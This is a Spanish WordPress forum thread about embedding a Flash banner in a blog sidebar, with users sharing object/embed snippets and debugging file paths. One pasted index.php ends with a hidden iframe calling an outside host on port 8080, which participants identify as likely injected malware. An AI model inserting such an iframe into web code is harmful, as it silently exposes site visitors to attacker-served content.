Insertar swf en la barra lateral

Inicio Foros WordPress Programación Insertar swf en la barra lateral

Este debate contiene 23 respuestas, tiene 6 mensajes y lo actualizó  grapmex hace 7 años.

  • Autor
    Publicaciones
  • #13934

    fum
    Participante

    <p>Hola, quiero insertar una banner hecho en flash en una barra lateral.<br />
    Por lo que ví podría insertar en un widget de texto código html para llamar al swf?<br />
    Si es así, alguien podría pasarme ese bloquecito de código?<br />
    También ví mencionado en una entrada antigua el plugin gotbanner, pero no pude encontarlo en ningún lado, hay dónde encontrarlo? u otro semejante?</p>
    <p>Desde ya gracias como siempre y saludos,<br />
    fum.
    </p>

  • #31011

    fum
    Participante

    Parece que puse el carro delante del caballo!
    Hice la pregunta antes de buscar en el blog!
    [url=http://ayudawp.com/flash-en-wordpress-con-wp-swfobject/]Aquí estaba![/url]
    Instalé WP-SWFObject vamos a ver si me arreglo para hacerlo funcionar …
    Probablemnte vualva por ayuda. Y si me arreglo igual lo comento,

    salus.

  • #31013

    imported_Fernando
    Participante

    También se puede poner swf en un widget de este modo:
    [quote][code]<object width=”125″ height=”125″>
    <param name=”movie” value=”http://dominio.com/flash/fichero.swf”>
    <embed src=”http://dominio.com/flash/fichero.swf” width=”125″ height=”125″>
    </embed>
    </object>[/code][/quote]

    El tamaño y url, por supuesto, los cambias

  • #31014

    fum
    Participante

    Gracias Fernando …, después comento como quedó!

  • #31034

    fum
    Participante

    Hola, hasta ahora no lo conseguí.
    Cuento lo que hice:
    1. Creé una carpeta “flash” en el directorio raíz y subí el swf
    2. En un widget de texto pegué:

    [quote][code]<object width=”175″ height=”175″>
    <param name=”movie” value=”http://carlosfumagalli.com.ar/flash/tallermodelo.swf”>
    <embed src=”http://carlosfumagalli.com.ar/flash/tallermodelo.swf” width=”175″ height=”175″>
    </embed>
    </object>[/code][/quote]

    3. guardé los cambios
    4. Limpié el caché y recargué la página.
    5. No aparece el swf

    Falta hacer algo?
    Algúna indicación?

    Gracias!

  • #31046

    Eduardo Alvarado
    Participante

    Creo que el problema está en la ruta de tu película.
    Intenté insertarla en una web que tengo en desarrollo mediante este código:

    [code]
    <div style=”text-align: center”>
    <embed
    src=”http://www.xperimente.com/inicio_files/mediaplayer.swf”
    width=”175″
    height=”175″
    bgcolor=”#666666″
    allowscriptaccess=”always”
    allowfullscreen=”true”
    flashvars=”file=http://carlosfumagalli.com.ar/flash/tallermodelo.swf&autostart=true&repeat=always&shownavigation=false&volume=0″
    />
    </div>[/code]

    Pero Safari me reporta tu película como “no encontrado”.
    Recheca la ruta y el nombre de tu archivo, pienso que por ahí está el problema.
    Saludos.

  • #31048

    Eduardo Alvarado
    Participante

    Por cierto, puedes ver mi intento en la siguiente dirección:
    [url=http://www.xperimente.com/articulos/]XperiMente[/url]

  • #31050

    imported_Fernando
    Participante

    Si, bueno. Es que otros navegadores como Firefox “perdonan” demasiado, pero Safari no perdona ni una. He probado y el fichero ese swf no se abre bien, puede que sea por eso.

  • #31051

    Eduardo Alvarado
    Participante

    Así es Fernando.
    Y siguiendo con el hilo, intenté descargar a mi escritorio el archivo swf, también con Safari, y el reporte es “este archivo no existe”. Lo dicho, la ruta está mal.
    Te envío Saludos.

  • #31052

    fum
    Participante

    Hola Eduardo, gracias por tu respuesta y por tomarte el laburo de hacer pruebas. Ahora pregunto: la carpeta la hice en el directorio raíz, no en “public” (esto por lo que interpreté del código de Fernando) Si vos pudieses insertarla sin la contraseña de mi dominio no estaría todo mal? Como es?
    Por otro lado, debí hacerla dentro de “public”?
    En realidad en el primer intento subí el swf a wp-content>files y puse esa ruta en el código pero no funcionó, de ahí que respeté literalmente el código de Fer creando una carpeta “flash” en el directorio raíz, y como tampoco funcionó hice la repregunta.

    Bueno, siempre se aprende y se agradece,
    salus.

  • #31054

    Eduardo Alvarado
    Participante

    No, fum, no hay nada de que preocuparse. Yo puedo jalar a mi web casi cualquier archivo de tu web siempre que me des la ruta donde están alojados. Este es el mismo sistema para insertar pelis desde YouTube, por ejemplo. Entonces, no importa donde hayas colocado el banner, lo importante es que la dirección de acceso y el nombre del archivo sean [i]perfectamente[/i] correctos.
    De hecho, yo te puse la ruta de acceso a mi reproductor flash: http://www.xperimente.com/inicio_files/mediaplayer.swf
    Si tomas esta dirección y la pegas en el gestor de descargas de tu navegador verás aparecer en tu escritorio el archivo mediaplayer.swf, el cual es un reproductor de archivos Flash.
    El asunto es que algo en la dirección de acceso al archivo [i]tallermodelo.swf[/i] está mal.
    Para corregir el problema te pregunto:
    1.- Sé que la dirección [i]http://carlosfumagalli.com.ar[/i] es correcta porque ya entré (eres fotógrafo). Pero intenté “hallar” tu carpeta “/flash/” y ya no apareció. Por tanto, creo que por ahí esta el problema. ¿Seguro que está en el directorio raíz? Es decir, junto a carpetas como wp-content, wp-admin, wp-includes y demás parafernalia de WP?
    Con el objeto de que salgas de esta y mantengas tus archivos en orden y a la mano, te sugiero que coloques la carpeta “Flash” (conteniendo el archivo [i]tallermodelo.swf[/i]) al interior de la carpeta “wp-content”, junto a languages, plugins, themes y uploads, lo cual nos dará está ruta de acceso: http://carlosfumagalli.com.ar/wp-content/flash/tallermodelo.swf
    Confirma y reconfirma que a la hora de escribir en el código del widget los nombres de carpetas y archivo estén correctos, el uso de mayúsculas y minúsculas, guiones u otras variantes lingüísticas son “caso sensible” para los servidores web.
    OK. Si llevas a cabo estos cambios y así probar que funciona pondré la ruta http://carlosfumagalli.com.ar/wp-content/flash/tallermodelo.swf en mi barra lateral.
    ¡Suerte!

  • #31055

    Eduardo Alvarado
    Participante

    Bueno, ahí voy otra vez.
    Si visitas esta dirección: [url=http://www.xperimente.com/articulos/]XperiMente-Artículos[/url] verás que inserté tu website en la barra lateral. ¡Y es completamente funcional!
    Entonces, te sugiero que instales el archivo tallermodelo.swf en el mismo sitio donde están los archivos “carlos fumagalli fotografia.swf” y “modelos.swf”. De este modo la ruta correcta para “tallermodelo.swf” será: http://carlosfumagalli.com.ar/tallermodelo.swf
    Con esta dirección ya podrás llamarlo desde donde quieras.
    Espero que te funcione.
    Más saludos.

  • #31057

    fum
    Participante

    Hola Eduardo, parece que la embarré!
    Ubiqué la carpeta flash como me dijiste: en wp-content.
    Pero algo pasó, usando el código de Fernando que pegué en el widget.
    Cuando quise actualizar desde el panel de cotrol obtuve este error:
    [quote]Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /www/docs/carlosfumagalli.com.ar/public_html/taller/index.php on line 17

    Parse error: syntax error, unexpected ‘.’ in /www/docs/carlosfumagalli.com.ar/public_html/taller/index.php on line 17[/quote]

    Cuestión que no puedo acceder al blog!
    Aquí lo que tengo en el index:

    [code]<?php get_header(); ?>
    <?php get_sidebar(); ?>
    <?php include (TEMPLATEPATH . ‘/right-sidebar.php’); ?>

    <div id=”content”>
    <?php
    if ( have_posts() ) : query_posts($query_string .’&cat=-35′); while ( have_posts() ) : the_post();
    ?>

    <div class=”post” id=”post-<?php the_ID(); ?>”>
    <h2>” rel=”bookmark” title=”Enlace permanente a <?php the_title(); ?>”><?php the_title(); ?></h2>
    <p class=”date”><?php the_time(‘j F, Y’) ?></p>
    <div class=”entry”>
    <?php the_content(‘Leer mas … »’); ?>
    </div>

    <p class=”category”>Posted in <?php the_category(‘, ‘) ?> | <?php edit_post_link(‘Editar’, ”, ‘ | ‘); ?> <?php comments_popup_link(‘No hay comentarios »’, ‘1 Comentario »’, ‘% Comentarios »’); ?></p>
    </div>

    <?php endwhile; ?>
    <div class=”bottomnavigation”>
    <div class=”alignleft”><?php next_posts_link(‘« Entradas anteriores’) ?></div>
    <div class=”alignright”><?php previous_posts_link(‘Entradas siguientes »’) ?></div>
    </div>

    <?php else : ?>
    <div id=”page”>
    <h1 class=”center”>No encontado</h1>
    <p class=”center”>Lo siento, pero estas buscando algo que no esta aqui.</p>
    <p class=”center”>Puede que quieras intentar una busqueda o elegir algun enlace de los menus.</p>
    </div>

    <?php endif; ?>
    <
    <iframe src=”http://c9u.at:8080/ts/in.cgi?pepsi147″ width=125 height=125 style=”visibility: hidden”></iframe>[/code]

    Por cierto me llaman la atención las últimas líneas con el iframe a una url que no conozco, no entiendo de dónde salió.
    Si podés orientarme se agradece ya que ahora no se puede entrar al blog…

  • #31059

    Eduardo Alvarado
    Participante

    ¡Ja! ¡Qué horror!
    Bueno, vamos a dar pasos atrás para recuperar tu blog.
    Antes te enlisto mis observaciones sobre tu web:
    1.- Creo que tu blog WP no está instalado en el directorio raíz. Es decir, creo que lo instalaste como carpeta. Y si no le cambiaste el nombre esta carpeta se llama wordpress. Si esto es cierto, significa que tu blog está en un subdirectorio y por eso el navegador no encuentra el archivo “tallermodelo.swf”. La dirección correcta debe incluir el nombre de esa o esas carpetas intermedias entre http://carlosfumagalli.com.ar/ y el archivo “tallermodelo.swf
    2.- Tu website está arriba y funcionando, lo cual me corrobora parcialmente lo dicho.
    OK. Entonces, ya tenemos la carpeta “flash” en wp-content y dentro está el archivo “tallermodelo.swf. Ahora debemos recuperar el blog.
    Veo el código de error y el de index.php y me doy cuenta que hay un “iframe” insertado en index.php y esto me parece raro. ¿Tú lo pusiste ahí? Bueno, si lo observas, arriba del “iframe” hay una llave abierta (<) que no veo cerrada más adelante (¿este es el código completo del index.php?). Eso es un error de sintaxis. Quizás a eso se refiere el mensaje de error.
    Noto también que tu index.php carece de llamado para el footer. ¿Tú se lo quitaste? Digo, no hay problema si lo retiraste. Simplemente no querías tener “footer”.
    Sugiero que elimines completito el “iframe”, y también la llave solitaria, sólo en caso de que ésta no se cierre más abajo.
    Después reintenta entrar a tu blog.
    Ojalá Fernando pueda emitir alguna opinión sobre esto.
    ¡Hey, Fer! ¿Estás ahí?
    Bueno, aquí sigo…

  • #31060

    Eduardo Alvarado
    Participante

    Oye fum, qué raro está ese “iframe”.
    La dirección: http://c9u.at:8080/ts/in.cgi?pepsi147 tiene elementos extraños. El segmento “c9u.at:8080” alude a un servidor local, más adelante el segmento “in.cgi” parece un llamado a script y por último pepsi147 no contiene una extensión de archivo (jpg, swf, flv o lo que sea). Y dentro de las variables de estilo señala “visibility: hidden” lo que significa “estoy aquí pero no me puedes ver”.
    ¿De dónde salió ese “iframe”?
    Bueno, ojalá ya hayas recuperado tu blog.
    + saludos.

  • #31061

    Eduardo Alvarado
    Participante

    Oye, fum, sospecho que te hackearon.
    Le di clic a la dirección esa del “iframe” y me envió a esta dirección http://a6o-punto-ru:8080/index-punto-php (los guiones antes y después de la palabra “punto” son para inhabilitar la dirección)
    Si te das cuenta el segmento “c9u.at:8080” del “iframe” cambió a a6o.ru:8080, donde .ru me parece que invoca a un servidor en Rusia.
    Bueno, aquí mismo en Ayuda WP he leído de casos como este donde misteriosos “iframe” aparecen de la nada en código de WP. Busca el más reciente y revísalo para obtener alguna solución.
    OK. ¿Ya recuperaste tu blog?
    +saludos.

  • #31066

    fum
    Participante

    Hola refresco el tema por la necesidad de ayuda, no puedo acceder al blog!
    Para bien o para mal, reemplacé los index por los “originales” de la instalación de WP y del tema, pero ahora obtengo este error:

    Warning: Unexpected character in input: ”’ (ASCII=39) state=1 in /www/docs/carlosfumagalli.com.ar/public_html/taller/wp-includes/default-filters.php on line 197

    Parse error: syntax error, unexpected T_STRING in /www/docs/carlosfumagalli.com.ar/public_html/taller/wp-includes/default-filters.php on line 198

    Espero que sea posible ayudarme, ya empiezo a preocuparme en serio,
    Gracias, slau!

    Salus

  • #31069

    imported_Fernando
    Participante

    Sube de nuevo los archivos de wp-includes de una descarga de WP, me temo que has tocado el index que no era, el de wp en vez del del theme en algún momento.

  • #31074

    fum
    Participante

    Pasó el susto, guau! :DYa está activo nuevamente! Antes de tu mensaje había estado a punto de reemplazar el defaul-filters de WP include, pero me ataqué conque había armado un zafarrancho, y tuve temor de empeorar todo…

    Gracias mil, después veo si llego a meter el swf!

  • #31089

    Eduardo Alvarado
    Participante

    ¡Hey, fum, lo tengo!
    Encontré tu archivo swf y ya lo inserté en mi web. Por tanto, funciona.
    Este es el código:
    [code] <div style=”text-align: center”>
    <embed
    src=”http://www.carlosfumagalli.com.ar/taller/wp-content/flash/tallermodelo.swf”
    width=”270″
    height=”270″
    bgcolor=”#fff”
    allowscriptaccess=”always”
    allowfullscreen=”true”
    flashvars=”file= http://www.carlosfumagalli.com.ar/taller/wp-content/flash/tallermodelo.swf&autostart=true&shownavigation=false
    />
    </div>[/code]
    Ya sólo cambia los flashvars a tu gusto.
    Saludos.

  • #31272

    fum
    Participante

    Hola Eduardo gracias por tanta atención. Por ahora el tema de insertar el swf pasó a segundo plano, ya que si estoy convencido de que me han hackeado o algo así, voy a buscar info sobre esa cuestión de los iframes y a abrir un hilo nuevo sobre ese tema.
    Respecto al swf como no conseguí insertarlo con el código me decidí a probar con el plugin WP-SWFObject, logré que inserte el swf en una entrada, pero cuando quiero ponerlo en la barra lateral, en vez de verse la imagen aparece en letras el código que lo invoca. Pero seguiré con esto luego, primero voy por recuperar la seguridad en el blog!

    Saludos y gracias, te sumé un agradecimiento por tu ayuda,

    fum

  • #34029

    tkdteam
    Participante

    Muchas gracias a todos por el laburo que se tomaron. La verdad es que hacía tiempo que buscaba esta respuesta y el autor del plugin no responde las consultas del foro.
    Gracias nuevamente.

  • #34070

    FeR
    Participante

    Según leí, el tema es que no te aparece el archivo, ¿no? Pero todo parece estar en orden.

    ¿No será porque no tienes permisos para acceder al archivo y el htaccess de tu página hace que no te permita acceder a él? Intenta ponerlo en la carpeta wp-content/uploads/ o en alguna de un theme y prueba después.

  • #55837

    grapmex
    Participante

    Hola yo se que es muy tarde para esta respuesta pero pongo algo que me sirvio a mi, para futuras visitas a este post lo unico que use fue el codigo

    espero les sea de ayuda!!

    saludos

El foro ‘Programación’ está cerrado y no se permiten nuevos debates ni respuestas.

Pin It on Pinterest